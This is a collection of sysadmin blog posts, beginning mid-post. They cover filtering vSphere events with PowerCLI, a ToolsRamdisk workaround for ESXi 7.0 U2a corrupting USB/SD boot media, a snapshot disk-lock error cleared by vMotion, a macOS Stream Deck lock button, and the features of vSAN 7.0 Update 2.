PS /Users/esod> Get-VMHost esx-11.esod.local | Get-VIEvent -MaxSamples 1 EventTypeId : com.vmware.vc.TaHostAttestUnsetEvent Severity : info Message : Arguments : ObjectId : host-4373 ObjectType : HostSystem ObjectName : esx-11.esod.local Fault : Key : 592127 ChainId : 592127 CreatedTime : 05/19/2021 08:23:42 UserName : Datacenter : VMware.Vim.DatacenterEventArgument ComputeResource : VMware.Vim.ComputeResourceEventArgument Host : VMware.Vim.HostEventArgument Vm : Ds : Net : Dvs : FullFormattedMessage : Trusted Host attestation status unset. ChangeTag : Adding a filter, to get events performed by a specific domain (or user) PS /Users/esod> Get-VIEvent | Where-Object UserName -ilike "esod\*" | Select-Object CreatedTime,ipaddress,username,fullformattedmessage -Last 3 CreatedTime IpAddress UserName FullFormattedMessage ----------- --------- -------- -------------------- 05/19/2021 08:15:15 10.0.1.115 ESOD\svc-vmw-log User ESOD\svc-vmw-log@10.0.1.115 logged in as JAX-WS RI 2.2.9-b130926.1035 svn-revision#5f6196f2b90e9460065a4c2f4e30e065b245e51e 05/19/2021 08:14:00 10.0.1.114 ESOD\svc-vmw-vrops User ESOD\svc-vmw-vrops@10.0.1.114 logged out (login time: Wednesday, 19 May, 2021 06:13:59 AM, number of API invocations: 6, user agent: VMware vim-java 1.0) 05/19/2021 08:13:59 10.0.1.114 ESOD\svc-vmw-vrops User ESOD\svc-vmw-vrops@10.0.1.114 logged in as VMware vim-java 1.0 Bonus: If you’re on MacOS and need GridView # Another, maybe cooler, way to filter (well, I usually do this) is to just pipe the output to GridView (it runs in RAM, hence it is really, really fast to search), and just apply some filters there. Applying, or re-applying, search filter(s) is as easy as typing something new on the keyboard. Note: The steps below are performed from pwsh on my MacOS (which does not have Out-GridView by default), hence this might look different for you. If you’re using Windows, you’ll natively have Out-GridView by default - great! Use that! 
If you’re on MacOS (like I am), I previously used to install the module “Microsoft.PowerShell.GraphicalTools” Install-Module Microsoft.PowerShell.GraphicalTools Now, this used to work just fine, but I’m currently having trouble getting it to play nice in MacOS Catalina (it keeps crashing, etc.). I recently discovered another cool tool (if using pwsh on MacOS), called Out-ConsoleGridView, released back in 2020. Install-Module Microsoft.PowerShell.ConsoleGuiTools I can now pipe a lot of output to the new “Out-ConsoleGridView”. Let’s retry the Get-VIEvent, but increase the output to the last 999 events Get-VIEvent | Where-Object UserName -ilike "esod\*" | Select-Object CreatedTime,ipaddress,username,fullformattedmessage -Last 999 | Out-ConsoleGridView As you can see from the output below, I now have the possibility to filter on “anything”, hence I can throw more output into the GridView and filter there (in RAM, which is much faster than polling output again and again). I may now filter on e.g. the IP ending in 1.99, by just typing 1.99 in the Filter box. Related articles, discussing topics in more detail # https://devblogs.microsoft.com/powershell/introducing-consoleguitools-preview/ https://www.vembu.com/blog/vsphere-tasks-and-events-tips-to-track/ https://devblogs.microsoft.com/powershell/out-gridview-returns/ --- # ESXi 7.0 U2a Potentially Killing USB and SD drives! URL: https://vNinja.net/2021/05/18/esxi-7.0-u2a-killing-usb-and.sd-drives/ Date: 2021-05-18 Author: Tags: ESXi, VMware, vSphere, esod Guest Post # This is a guest post by Espen Ødegaard, Senior Systems Consultant for Proact. # You can find him on Twitter and LinkedIn. Espen is usually found in vmkernel.log, esxtop, sexigraf or vSAN Observer. Or eating, he eats a lot. Workaround per 01. June 2021 # As VMware has not released a fix yet (regarding issues with SD card and USB drive), I’m still experiencing issues with ESXi 7.0 U2a Potentially Killing USB and SD drives, running from USB or SD card installs. 
As the previous workaround (copying VMware Tools to a RAMDISK with the ToolsRamdisk option) only worked for 8 days (in my case), I needed something more “permanent”, to get the ESXi hosts more “stable” (e.g. the host being able to enter maintenance mode, move VMs around, snapshots/backup, doing CLI-stuff/commands, etc.). See ESXi 7.0 SD Card/USB Drive Issue Temporary Workaround for details. After upgrading my 4-node vSAN cluster (homelab) to ESXi 7.0 build 17867351 U2a, I detected that ESXi had issues talking to the USB device where ESXi was installed. I found a related KB from VMware, outlining issues with the new VMFS-L, which became my baseline for troubleshooting: VMFS-L Locker partition corruption on SD cards in ESXi 7.0 (83376) In short, it says that the VMFS-L partition may have become corrupt, and a re-install is needed. “There is no resolution for the SD card corruption as of the time this article was published” The mentioned workaround, suggesting moving the scratch partition, is not applicable in my case, as I’ve already verified that my scratch partition is running from RAMDISK. Verify the scratch mountpoint [root@esx-13:~] vmkfstools -Ph /scratch/ visorfs-1.00 (Raw Major Version: 0) file system spanning 1 partitions. File system label (if any): Mode: private Capacity 3.9 GB, 3.1 GB available, file block size 4 KB, max supported file size 0 bytes Disk Block Size: 4096/4096/0 UUID: 00000000-00000000-0000-000000000000 Partitions spanned (on "notDCS"): memory Is Native Snapshot Capable: NO List the contents of the VMFS-L partition (LOCKER) I also ran a quick find command (from another working host), to get all contents of the mounted VMFS-L partition. Notice that the vmtoolsRepo packages are located here. 
```shell
[root@esx-11:~] find /vmfs/volumes/LOCKER-6092ba2b-1fdb3f52-337c-000c292b45b0/
/vmfs/volumes/LOCKER-6092ba2b-1fdb3f52-337c-000c292b45b0/
/vmfs/volumes/LOCKER-6092ba2b-1fdb3f52-337c-000c292b45b0/.fbb.sf
/vmfs/volumes/LOCKER-6092ba2b-1fdb3f52-337c-000c292b45b0/.fdc.sf
/vmfs/volumes/LOCKER-6092ba2b-1fdb3f52-337c-000c292b45b0/.pbc.sf
/vmfs/volumes/LOCKER-6092ba2b-1fdb3f52-337c-000c292b45b0/.sbc.sf
/vmfs/volumes/LOCKER-6092ba2b-1fdb3f52-337c-000c292b45b0/.vh.sf
/vmfs/volumes/LOCKER-6092ba2b-1fdb3f52-337c-000c292b45b0/.pb2.sf
/vmfs/volumes/LOCKER-6092ba2b-1fdb3f52-337c-000c292b45b0/.sdd.sf
/vmfs/volumes/LOCKER-6092ba2b-1fdb3f52-337c-000c292b45b0/.jbc.sf
/vmfs/volumes/LOCKER-6092ba2b-1fdb3f52-337c-000c292b45b0/packages
/vmfs/volumes/LOCKER-6092ba2b-1fdb3f52-337c-000c292b45b0/packages/var
/vmfs/volumes/LOCKER-6092ba2b-1fdb3f52-337c-000c292b45b0/packages/var/db
/vmfs/volumes/LOCKER-6092ba2b-1fdb3f52-337c-000c292b45b0/packages/var/db/locker
/vmfs/volumes/LOCKER-6092ba2b-1fdb3f52-337c-000c292b45b0/packages/var/db/locker/vibs
/vmfs/volumes/LOCKER-6092ba2b-1fdb3f52-337c-000c292b45b0/packages/var/db/locker/vibs/tools-light--2910230392612735297.xml
/vmfs/volumes/LOCKER-6092ba2b-1fdb3f52-337c-000c292b45b0/packages/var/db/locker/vibs/tools-light--2910230392612735297.xml.sig
/vmfs/volumes/LOCKER-6092ba2b-1fdb3f52-337c-000c292b45b0/packages/var/db/locker/vibs/tools-light--2910230392612735297.xml.orig
/vmfs/volumes/LOCKER-6092ba2b-1fdb3f52-337c-000c292b45b0/packages/var/db/locker/bulletins
/vmfs/volumes/LOCKER-6092ba2b-1fdb3f52-337c-000c292b45b0/packages/var/db/locker/profiles
/vmfs/volumes/LOCKER-6092ba2b-1fdb3f52-337c-000c292b45b0/packages/var/db/locker/baseimages
/vmfs/volumes/LOCKER-6092ba2b-1fdb3f52-337c-000c292b45b0/packages/var/db/locker/addons
/vmfs/volumes/LOCKER-6092ba2b-1fdb3f52-337c-000c292b45b0/packages/var/db/locker/solutions
/vmfs/volumes/LOCKER-6092ba2b-1fdb3f52-337c-000c292b45b0/packages/var/db/locker/manifests
/vmfs/volumes/LOCKER-6092ba2b-1fdb3f52-337c-000c292b45b0/packages/var/db/locker/reservedComponents
/vmfs/volumes/LOCKER-6092ba2b-1fdb3f52-337c-000c292b45b0/packages/var/db/locker/reservedVibs
/vmfs/volumes/LOCKER-6092ba2b-1fdb3f52-337c-000c292b45b0/packages/vmtoolsRepo
/vmfs/volumes/LOCKER-6092ba2b-1fdb3f52-337c-000c292b45b0/packages/vmtoolsRepo/floppies
/vmfs/volumes/LOCKER-6092ba2b-1fdb3f52-337c-000c292b45b0/packages/vmtoolsRepo/floppies/pvscsi-Windows2008.flp
/vmfs/volumes/LOCKER-6092ba2b-1fdb3f52-337c-000c292b45b0/packages/vmtoolsRepo/floppies/pvscsi-Windows8.flp
/vmfs/volumes/LOCKER-6092ba2b-1fdb3f52-337c-000c292b45b0/packages/vmtoolsRepo/floppies/pvscsi-WindowsVista.flp
/vmfs/volumes/LOCKER-6092ba2b-1fdb3f52-337c-000c292b45b0/packages/vmtoolsRepo/vmtools
/vmfs/volumes/LOCKER-6092ba2b-1fdb3f52-337c-000c292b45b0/packages/vmtoolsRepo/vmtools/isoimages_manifest.txt
/vmfs/volumes/LOCKER-6092ba2b-1fdb3f52-337c-000c292b45b0/packages/vmtoolsRepo/vmtools/isoimages_manifest.txt.sig
/vmfs/volumes/LOCKER-6092ba2b-1fdb3f52-337c-000c292b45b0/packages/vmtoolsRepo/vmtools/linux.iso
/vmfs/volumes/LOCKER-6092ba2b-1fdb3f52-337c-000c292b45b0/packages/vmtoolsRepo/vmtools/linux.iso.sig
/vmfs/volumes/LOCKER-6092ba2b-1fdb3f52-337c-000c292b45b0/packages/vmtoolsRepo/vmtools/linux_avr_manifest.txt
/vmfs/volumes/LOCKER-6092ba2b-1fdb3f52-337c-000c292b45b0/packages/vmtoolsRepo/vmtools/linux.iso.sha
/vmfs/volumes/LOCKER-6092ba2b-1fdb3f52-337c-000c292b45b0/packages/vmtoolsRepo/vmtools/linux_avr_manifest.txt.sig
/vmfs/volumes/LOCKER-6092ba2b-1fdb3f52-337c-000c292b45b0/packages/vmtoolsRepo/vmtools/windows.iso
/vmfs/volumes/LOCKER-6092ba2b-1fdb3f52-337c-000c292b45b0/packages/vmtoolsRepo/vmtools/windows.iso.sha
/vmfs/volumes/LOCKER-6092ba2b-1fdb3f52-337c-000c292b45b0/packages/vmtoolsRepo/vmtools/windows.iso.sig
/vmfs/volumes/LOCKER-6092ba2b-1fdb3f52-337c-000c292b45b0/packages/vmtoolsRepo/vmtools/windows_avr_manifest.txt
/vmfs/volumes/LOCKER-6092ba2b-1fdb3f52-337c-000c292b45b0/packages/vmtoolsRepo/vmtools/windows_avr_manifest.txt.sig
```

Getting a host with issues into maintenance mode: physically remove the USB device first #

Getting the ESXi hosts with USB issues into maintenance mode was also a little tricky. Used to doing things “remote”, I wanted to try evacuating the VMs the usual way (just enter maintenance mode, and DRS will handle the rest), but this was a no-go. While entering maintenance mode, the VMs would start being vMotioned (job status), but nothing actually happened. All VMs “started” the Migrating/vMotion job (status 9%, or 12%, in vCenter), but checking the host with esxtop, under network, I found that no traffic was occurring on the vMotion interface, which usually is at full pipe when vMotion occurs. Re-checking the logs, the USB issues repeated, again and again. I thought I’d try to physically remove the USB device from the host, as this would trigger a “proper” All Paths Down (APD) on the USB device. So I physically removed the USB device. Waited 2-3 minutes, and boom - the vMotion process finished at once. Digging into the logs (again, /var/log/vmkernel.log has the answers), I could verify the APD event.

```
2021-05-15T14:00:03.326Z cpu7:1048720)StorageApdHandler: 606: APD timeout event for 0x43040c4c34d0 [mpx.vmhba32:C0:T0:L0]
2021-05-15T14:00:03.326Z cpu7:1048720)StorageApdHandlerEv: 126: Device or filesystem with identifier [mpx.vmhba32:C0:T0:L0] has entered the All Paths Down Timeout state after being in the All Paths Down state for 140 seconds. I/Os will now be fast faile$
2021-05-15T14:00:03.326Z cpu3:1048731)ScsiDeviceIO: 4277: Cmd(0x4578c1283080) 0x1a, CmdSN 0x93be0 from world 0 to dev "mpx.vmhba32:C0:T0:L0" failed H:0x5 D:0x0 P:0x0
2021-05-15T14:00:03.326Z cpu3:1048731)WARNING: NMP: nmp_DeviceStartLoop:740: NMP Device "mpx.vmhba32:C0:T0:L0" is blocked. Not starting I/O from device.
2021-05-15T14:00:03.326Z cpu3:1055182)LVM: 6817: Forcing APD unregistration of devID 6092ba2b-13467d16-8d9c-000c292b45b0 in state 1.
2021-05-15T14:00:03.326Z cpu3:1055182)LVM: 6192: Could not open device mpx.vmhba32:C0:T0:L0:7, vol [6092ba2a-e004ead6-09c5-000c292b45b0, 6092ba2a-e004ead6-09c5-000c292b45b0, 1]: No connection
2021-05-15T14:00:03.326Z cpu3:1055182)Vol3: 2129: Could not open device 'mpx.vmhba32:C0:T0:L0:7' for volume open: Not found
2021-05-15T14:00:03.326Z cpu3:1055182)Vol3: 4339: Failed to get object 28 type 1 uuid 6092ba2b-1fdb3f52-337c-000c292b45b0 FD 0 gen 0 :Not found
2021-05-15T14:00:03.326Z cpu3:1055182)WARNING: Fil3: 1534: Failed to reserve volume f533 28 1 6092ba2b 1fdb3f52 c00337c b0452b29 0 0 0 0 0 0 0
2021-05-15T14:00:03.326Z cpu3:1055182)Vol3: 4339: Failed to get object 28 type 2 uuid 6092ba2b-1fdb3f52-337c-000c292b45b0 FD 4 gen 1 :Not found
2021-05-15T14:00:03.326Z cpu4:2205969)VFAT: 5144: Failed to get object 36 type 2 uuid 4365f3f4-494e65bd-7b92-e7c78fac244e cnum 0 dindex fffffffecdate 0 ctime 0 MS 0 :No connection
2021-05-15T14:00:03.326Z cpu3:1051988)LVM: 6817: Forcing APD unregistration of devID 6092ba2b-13467d16-8d9c-000c292b45b0 in state 1.
2021-05-15T14:00:03.326Z cpu3:1051988)LVM: 6817: Forcing APD unregistration of devID 6092ba2b-13467d16-8d9c-000c292b45b0 in state 1.
```

So I got both hosts into maintenance mode, and rebooted. Everything was working again.

New findings, from an old KB #

Continuing my research, I stumbled upon a new thread in the Dell Communities (VMware 7.0 U2 losing contact with SD card), where VMware Support sent a workaround from an older KB, related to moving vmtoolsRepo to RAMDISK: High frequency of read operations on VMware Tools image may cause SD card corruption (2149257). In ESXi 6.0 Update 3 and later, changes were made to reduce the number of read operations being sent to the SD card; an advanced parameter was introduced that allows you to migrate your VMware Tools image to ramdisk on boot.
This way, the information is read only once from the SD card per boot cycle. Note: Even though KB2149257 currently only targets ESXi 6.0 and 6.5 (it doesn’t mention ESXi 7.0 at all, as of the time of writing), I’m guessing the same workaround may now apply in ESXi 7.0 U1+, especially if the old “throttle” (the fix in 6.0 U3) has now been removed while the new VMFS-L continues to be improved.

Applying the workaround: adding the ToolsRamdisk option #

As mentioned in KB2149257, I added the ToolsRamdisk option on all hosts with ESXi 7.0 build 17867351 U2a.

Create the option first:

```shell
esxcfg-advcfg -A ToolsRamdisk --add-desc "Use VMware Tools repository from /tools ramdisk" --add-default "0" --add-type 'int' --add-min "0" --add-max "1"
```

Set the value to 1:

```shell
esxcli system settings advanced set -o /UserVars/ToolsRamdisk -i 1
```

Verify the value is set:

```shell
esxcli system settings advanced list -o /UserVars/ToolsRamdisk
```

Then reboot the host (as the setting applies at boot).

Verify the new tools mountpoint running from RAMDISK #

After a reboot, I found the newly created mountpoint located under /tools. Checking the location with vmkfstools -Ph, we can see that it’s mounted in a RAMDISK.

Checking the mountpoint with ls:

```shell
[root@esx-11:~] ls -hal /tools/
total 16
drwxrwxrwt    1 root     root          512 May 18 14:56 .
drwxr-xr-x    1 root     root          512 May 18 18:18 ..
drwxr-xr-x    1 root     root          512 May 18 14:56 floppies
drwxr-xr-x    1 root     root          512 May 18 14:56 vmtools
```

Getting the mountpoint location with vmkfstools -Ph:

```shell
[root@esx-11:~] vmkfstools -Ph /tools/
visorfs-1.00 (Raw Major Version: 0) file system spanning 1 partitions.
File system label (if any):
Mode: private
Capacity 4.2 GB, 3.2 GB available, file block size 4 KB, max supported file size 0 bytes
Disk Block Size: 4096/4096/0
UUID: 00000000-00000000-0000-000000000000
Partitions spanned (on "notDCS"): memory
Is Native Snapshot Capable: NO
```

Checking vmkernel.log for boot events containing the word “tools” #

```shell
[root@esx-11:~] cat /var/log/vmkernel.log|grep -i tools
2021-05-18T14:55:44.765Z cpu7:1048823)SchedVsi: 2098: Group: host/vim/vimuser/vmtoolsd(1725): min=46 max=46 minLimit=46, units: mb
2021-05-18T14:56:02.361Z cpu2:1048852)Activating Jumpstart plugin vmtoolsRepo.
2021-05-18T14:56:02.399Z cpu3:1049894)VisorFSRam: 871: tools with (0,286,0,256,1777)
2021-05-18T14:56:02.399Z cpu3:1049894)FSS: 8565: Mounting fs visorfs (430547881820) with -o 0,286,0,256,0,01777,tools on file descriptor 43054e9b9230
2021-05-18T14:56:15.302Z cpu3:1048852)Jumpstart plugin vmtoolsRepo activated.
2021-05-18T14:56:21.821Z cpu6:1050194)Starting service vmtoolsd
2021-05-18T14:56:21.830Z cpu6:1050194)Activating Jumpstart plugin vmtoolsd.
2021-05-18T14:56:21.852Z cpu4:1050194)Jumpstart plugin vmtoolsd activated.
```

Listing the content of the /tools directory:

```shell
[root@esx-11:~] find /tools/
/tools/
/tools/floppies
/tools/floppies/pvscsi-WindowsVista.flp
/tools/floppies/pvscsi-Windows2008.flp
/tools/floppies/pvscsi-Windows8.flp
/tools/vmtools
/tools/vmtools/windows.iso.sig
/tools/vmtools/linux.iso.sha
/tools/vmtools/linux_avr_manifest.txt.sig
/tools/vmtools/isoimages_manifest.txt.sig
/tools/vmtools/linux.iso
/tools/vmtools/linux_avr_manifest.txt
/tools/vmtools/isoimages_manifest.txt
/tools/vmtools/windows.iso
/tools/vmtools/windows_avr_manifest.txt.sig
/tools/vmtools/windows_avr_manifest.txt
/tools/vmtools/windows.iso.sha
/tools/vmtools/linux.iso.sig
```

So yeah, there you have it. Perhaps using the standard profile on USB was a bad idea (it includes VMware Tools, vs the “no-tools” profile).
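For a quick non-interactive check, the same vmkernel.log signature can be grepped for instead of reading the log by hand. A minimal, locally runnable sketch, assuming the relevant log lines have been saved to a sample file (the /tmp path is illustrative; the log lines are copied from the output above):

```shell
# Hypothetical sketch: confirm from a saved vmkernel.log snippet that the
# VMware Tools repository was mounted on a RAMDISK (visorfs) at boot.
cat > /tmp/vmkernel-sample.log <<'EOF'
2021-05-18T14:56:02.361Z cpu2:1048852)Activating Jumpstart plugin vmtoolsRepo.
2021-05-18T14:56:02.399Z cpu3:1049894)VisorFSRam: 871: tools with (0,286,0,256,1777)
2021-05-18T14:56:02.399Z cpu3:1049894)FSS: 8565: Mounting fs visorfs (430547881820) with -o 0,286,0,256,0,01777,tools on file descriptor 43054e9b9230
2021-05-18T14:56:15.302Z cpu3:1048852)Jumpstart plugin vmtoolsRepo activated.
EOF

# A visorfs mount carrying the "tools" option indicates the RAMDISK-backed repo.
if grep -q 'Mounting fs visorfs.*tools' /tmp/vmkernel-sample.log; then
  echo "tools repo mounted from RAMDISK"
else
  echo "no RAMDISK tools mount found"
fi
```

On a real host the grep would of course run against /var/log/vmkernel.log directly, as shown in the cat|grep one-liner above.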
Usually I use the “no-tools” profile for USB installs, but I recently switched my USB devices to better SanDisk Ultra Fit SDCZ430-032G-G46 devices, which I thought were way better and more stable.

Bonus: Tips on proactively detecting issues on existing USB and SD card installs #

The following might apply if there are issues with the USB or SD card in your environment:

- Running the command df -h from the CLI will get stuck, or fail, for the LOCKER mount (the VMFS-L partition)
- Checking the host’s logfile /var/log/vmkernel.log, you’ll notice entries similar to this:

```
2021-05-15T13:48:27.674Z cpu6:1048743)ScsiDeviceIO: 4315: Cmd(0x4578c12ad880) 0x1a, cmdId.initiator=0x45389cb1a6f8 CmdSN 0x93a68 from world 0 to dev "mpx.vmhba32:C0:T0:L0" failed H:0x5 D:0x0 P:0x0 Cancelled from path layer. Cmd count Active:1
```

I suggest setting up a vRLI alert on an exact match of “Cancelled from path layer. Cmd count Active”, which I have only found on faulty hosts, for now. I’ve actually set up a webhook alert, so if any USB issues arise, I immediately get notified in my Slack channel and can react to them early on.

In summary #

- Installing ESXi using the no-tools image (e.g. ESXi-70U2a-17867351-no-tools) is probably better suited for USB/SD card installs, and may not require the option/workaround provided above.
- The user setting /UserVars/ToolsRamdisk outlined in KB2149257 loads VMware Tools to RAMDISK at boot (mounted under /tools), possibly preventing burnt-out USB drives and SD cards (well, time will tell).
- A funeral may be needed for my USB devices.

---

# ESXi: Error Occurred While Saving Snapshot Msg.changetracker

URL: https://vNinja.net/2021/05/18/error-occurred-while-saving-snapshot-msg.changetracker.mirrorcopystatus/
Date: 2021-05-18
Author:
Tags: vCenter, VMware, Snapshot, vSAN, esod

Guest Post #

This is a guest post by Espen Ødegaard, Senior Systems Consultant for Proact. You can find him on Twitter and LinkedIn. Espen is usually found in vmkernel.log, esxtop, sexigraf or vSAN Observer.
Or eating, he eats a lot.

I recently ran into a strange issue in my home lab, running ESXi 7.0.2, build 17867351, where Veeam Backup & Replication v10 reported the following error:

Veeam Backup & Replication log entries #

```
16.05.2021 17:34:50 :: Failed to create VM snapshot. Error: CreateSnapshot failed, vmRef vm-4013, timeout 1800000, snName VEEAM BACKUP TEMPORARY SNAPSHOT, snDescription Please do not delete this snapshot. It is being used by Veeam Backup., memory False, quiesce False
```

The same error could also be seen in vCenter:

vCenter log entries #

```
16.05.2021 17:34:56 :: Error: An error occurred while saving the snapshot: msg.changetracker.MIRRORCOPYSTATUS.
```

Findings #

The same issue arises when manually creating a snapshot in vCenter, so it does not seem to be Veeam Backup & Replication specific. A quick look into vmware.log for the affected VM:

Full vmware.log for the affected VM #

```
2021-05-16T15:38:49.395Z| vmx| | I005: VigorTransportProcessClientPayload: opID=knxctxhk-242836-auto-57dh-h5:70044488-3a-9f-6432 seq=54938: Receiving Snapshot.Take request.
2021-05-16T15:38:49.397Z| vmx| | I005: SnapshotVMX_TakeSnapshot start: 'VM Snapshot 16%2f05%2f2021, 17:38:44', deviceState=0, lazy=0, quiesced=1, forceNative=0, tryNative=1, saveAllocMaps=0
2021-05-16T15:38:49.665Z| vmx| | I005: DISKLIB-LIB_CREATE : DiskLibCreateCreateParam: vmfsSparse grain size is set to 1 for '/vmfs/volumes/vsan:52b2da12ab7803d1-77d0a7d9896eb6ac/80f04160-c378-5f8b-871e-a4ae111c7980/idmc-01-000001.vmdk'
2021-05-16T15:38:49.852Z| vmx| | I005: DISKLIB-CBT :ChangeTrackerESX_CreateMirror: Created mirror node /vmfs/devices/svm/6d1716-25d0ef6-cbtmirror.
2021-05-16T15:38:49.953Z| vmx| | W003: DISKLIB-CBT : ChangeTrackerESX_GetMirrorCopyProgress: Failed to copy mirror: Lost previously held disk lock
2021-05-16T15:38:49.953Z| vmx| | I005: DISKLIB-LIB_BLOCKTRACK : DiskLibBlockTrackMirrorProgress: Failed to get mirror status of block track info file /vmfs/volumes/vsan:52b2da12ab7803d1-77d0a7d9896eb6ac/80f04160-c378-5f8b-871e-a4ae111c7980/idmc-01-ctk.vmdk.
2021-05-16T15:38:49.953Z| vmx| | I005: DISKLIB-CBT :ChangeTrackerESX_DestroyMirror: Destroyed mirror node 6d1716-25d0ef6-cbtmirror.
2021-05-16T15:38:49.976Z| vmx| | I005: SNAPSHOT: SnapshotPrepareTakeDoneCB: Failed to prepare block track.
2021-05-16T15:38:49.976Z| vmx| | I005: SNAPSHOT: SnapshotPrepareTakeDoneCB: Prepare phase complete (Could not get mirror copy status).
2021-05-16T15:38:49.976Z| vmx| | I005: SnapshotVMXPrepareTakeDoneCB: Prepare phase failed: Could not get mirror copy status (5).
2021-05-16T15:38:49.976Z| vmx| | I005: SnapshotVMXTakeSnapshotComplete: Done with snapshot 'VM Snapshot 16%2f05%2f2021, 17:38:44': 0
2021-05-16T15:38:49.977Z| vmx| | I005: SnapshotVMXTakeSnapshotComplete: Snapshot 0 failed: Could not get mirror copy status (5).
2021-05-16T15:38:49.977Z| vmx| | I005: VigorTransport_ServerSendResponse opID=knxctxhk-242836-auto-57dh-h5:70044488-3a-9f-6432 seq=54938: Completed Snapshot request with messages.
```

And there I found the locking issue:

```
2021-05-16T15:38:49.953Z| vmx| | W003: DISKLIB-CBT : ChangeTrackerESX_GetMirrorCopyProgress: Failed to copy mirror: Lost previously held disk lock
```

Resolution/workaround #

Since the lock is held locally by the ESXi host, I simply did a vMotion of the VM (to another host in my cluster) to clear the lock and have it re-issued by another host. After completing a vMotion of the affected VM, the snapshot completed successfully (and backup is now working again). My lab is running vSAN, so this does not seem related to VMware KB 2107795: Troubleshooting issues resulting from locked virtual disks.
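The failing step can be spotted quickly by filtering vmware.log for the CBT mirror error rather than reading the whole snapshot exchange. A minimal, locally runnable sketch, assuming the relevant log lines have been saved to a sample file (the /tmp path is illustrative; the log lines are copied from the excerpt above):

```shell
# Hypothetical sketch: scan a saved vmware.log snippet for the CBT mirror
# failure that blocked snapshot creation in this case.
cat > /tmp/vmware-sample.log <<'EOF'
2021-05-16T15:38:49.953Z| vmx| | W003: DISKLIB-CBT : ChangeTrackerESX_GetMirrorCopyProgress: Failed to copy mirror: Lost previously held disk lock
2021-05-16T15:38:49.976Z| vmx| | I005: SNAPSHOT: SnapshotPrepareTakeDoneCB: Failed to prepare block track.
EOF

# "Lost previously held disk lock" is the specific signature a vMotion cleared
# here; alert on it rather than on the generic snapshot failure message.
if grep -q 'Lost previously held disk lock' /tmp/vmware-sample.log; then
  echo "stale CBT disk lock detected - consider vMotioning the VM"
fi
```

On a real host the grep would run against the VM's vmware.log in its datastore directory instead of a sample file.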
The root cause of the issue is still unknown, but a vMotion cleared the lock, and backups have been running successfully for a few days since the original issue appeared. Hopefully it stays that way!

---

# Creating an Elgato Stream Deck Sleep Button in macOS

URL: https://vNinja.net/2021/04/15/elgato-stream-deck-sleep-button/
Date: 2021-04-15
Author: christian
Tags: Elgato, macOS, Stream Deck

I recently got an Elgato Stream Deck for the home office, and I’ve set it up mostly to control OBS Studio for a couple of projects I’m working on. Since I also have a couple of Key Light Airs, I also use it to control them. While setting it up, I figured I needed a sleep button on it that basically locks my MacBook and turns off the lights in one fell swoop. Conceptually this seemed like a very easy thing to set up, but it turns out there are some macOS quirks that need to be addressed for this to work. By default in macOS High Sierra, or newer, there is a predefined lock screen hotkey: Command ⌘ + Control ⌃ Q, which works very well. In fact, it works a little too well, as it turns out. The problem was that when I tried to enter Command ⌘ + Control ⌃ Q as the hotkey combination in my button settings in the Stream Deck configuration, the screen locked. Naturally. And Stream Deck never recorded the hotkey, since it automatically locked the MacBook. Luckily, there is a somewhat convoluted, but at the same time pretty easy, fix for this.

Creating a Lock/Sleep button for Stream Deck #

Assign a temporary lock hotkey. You will first need to temporarily assign a new hotkey for the lock screen, to ensure that macOS doesn’t lock the screen when hitting the original hotkey to record it in Stream Deck. To do this, navigate to System Preferences -> Keyboard -> App Shortcuts, and add a new hotkey by clicking the + sign. Under Menu Title, enter Lock Screen. This is important, as it needs to match the existing menu item.
Then, under Keyboard Shortcut, enter a new key combination that you can assign temporarily. In this example I used Command ⌘ + Control ⌃ L, but it can be anything. Then click Add. Next, create a Multi Action button in Stream Deck. Add a System -> Hotkey action to the Multi Action button, and assign it the Command ⌘ + Control ⌃ Q hotkey. This time macOS won’t lock up, since the hotkey for locking has been temporarily changed to whatever you chose in step 1. In my case, I also added a Stream Deck -> Control Center: On / Off action as well, as I wanted to make sure my Key Lights got turned off at the same time. Close the Stream Deck app. Finally, go back to System Preferences -> Keyboard -> App Shortcuts and delete the temporary Lock Screen definition, to restore the original Command ⌘ + Control ⌃ Q hotkey in macOS - and profit! Now your new Stream Deck Sleep/Lock button should work, in addition to the original macOS hotkey assignment. A bit counterintuitive at first glance, but it makes sense that the hotkey for locking the screen needs to be disabled to be able to record it into the Stream Deck app.

---

# VMware vSAN 7.0 Update 2 Announced

URL: https://vNinja.net/2021/03/09/vmware-vsan7u2-announced/
Date: 2021-03-09
Author: christian
Tags: vSphere, vSAN, VMware, ESXi

VMware vSAN 7.0 Update 2 has been made generally available, and what is new this time around? Disaggregated HCI, Durable Writes, Enhanced File Services, Efficiency Enhancements, vSAN over RDMA and more! Below is a quickfire list of new features and enhancements. As is customary, a new vSphere release comes with a new vSAN release as well. The vSAN VCG Notification Service has already been updated with the vSAN 7.0 Update 2 details: vSAN VCG Notification Service 9th of March 2021

What’s new in vSAN 7.0 Update 2? #

Disaggregated HCI #

Perhaps an oxymoron in itself, but vSAN 7 Update 2 comes with a new Disaggregated HCI option.
When vSAN HCI Mesh was announced back in September 2020 it was positioned as a way of sharing vSAN capacity between independent vSAN-enabled clusters, but in 7.0 Update 2 VMware takes this further. In this new release it will be possible to share vSAN storage from a vSAN-enabled cluster to non-vSAN clusters as well, over the vSAN network/protocols. No iSCSI or NFS in the picture here, just pure unadulterated vSAN traffic.

HCI Mesh Overview

- Up to 128 hosts can be connected to a remote vSAN datastore
- Storage Policy integrations with Deduplication & Compression or compression-only settings
- Data-at-rest encryption is supported
- Supported on both hybrid and all-flash vSAN configurations
- No vSAN license needed for HCI Mesh compute clusters

The real kicker here is the last item in the list above. There is no requirement for vSAN licensing in remote clusters that consume vSAN storage. vSAN Enterprise, or Enterprise Plus, licensing is required on the vSAN-enabled cluster itself. vSAN 7 Update 2 Configure Client Cluster As the screenshot above shows, space efficiency, Data-At-Rest encryption, Data-In-Transit encryption and large scale cluster support policies are defined on the destination (possibly non-vSAN) cluster, and not the source vSAN cluster. Being able to consume vSAN resources from other clusters in the environment is a great feature enhancement, and can potentially have huge design implications for a lot of customers going forward. vSAN 7 Update 2 HCI Mesh Compute Capacity Having compute-only and storage-enabled clusters provides a new level of flexibility, and scalability. Consider a blade-heavy environment where vSAN support is limited; those blades can now consume storage over Ethernet from a vSAN cluster even if their own HBAs are not on the HCL. Monitoring is also taken care of, even from the remote cluster's perspective.
vSAN 7 Update 2 Compute Cluster Performance Monitoring VMware has also published a video showing the setup.

Enhanced Data Durability During Unplanned Outages (Durable Writes) #

